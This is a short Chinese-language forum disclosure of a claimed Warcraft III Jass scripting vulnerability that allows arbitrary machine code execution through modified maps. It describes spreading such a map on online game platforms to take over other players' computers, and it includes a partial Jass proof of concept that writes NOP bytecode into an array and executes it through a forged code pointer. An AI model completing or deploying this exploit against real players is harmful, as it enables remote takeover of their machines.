注册
登录
| 关键词: 地图 机器码 语言 Jass 魔兽 meleeTwinkedHero TriggerAddAction 开发者 脚本 bytecode |
by ring04h, War3 Jass虚拟机经测试,存在严重漏洞!允许运行时动态创建并执行任意机器码 Jass属于War3为地图开发者提供的一套脚本语言,方便开发者开发或建立修改属于自己的地图。经过推断,CS (cstrike)可能也存在此类问题。 利用方式:登陆浩方或者VS对战平台,修改某张地图(例如DOTA的地图),开启游戏,等待其他玩家进入,开始游戏,即可执行任意机器码,控制玩家计算机。 Jass语言的用处Jass(正确地说是Jass2)是魔兽3的脚本语言, 用于控制地图的进程和行为, 是魔兽游戏和地图的基础. 正常的地图编辑中摆放的单位(Unit), 设置的触发(Trigger)等最终都会被翻译成Jass语言存在地图文件里在游戏时被调用. POC: set bj_meleeTwinkedHeroes[1024] = 0x90909090set bj_meleeTwinkedHeroes[1025] = 0x90909090 //and other bytecode giberish.... local code C = I2Code( code2I(function GetRandomDirectionDeg) + 0xC92D8 ) call TriggerAddAction(t, C)call TriggerExecute(t) //It will run whatever bytecode 90 90 90 90 means function main takes nothing returns nothingset t = CreateTrigger()call TriggerAddAction(t, i2code(0x00929217) )a[0]=0x45623512a[1]=0x34562323a[2]=0x62329301...//other thousand lines of this...b[0]=0x12312333endfunction 上图: 文章标题加上了by ring04h,是说明ring04h将对以上的言论负责,其它稍后再编辑详情,上POC! |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|
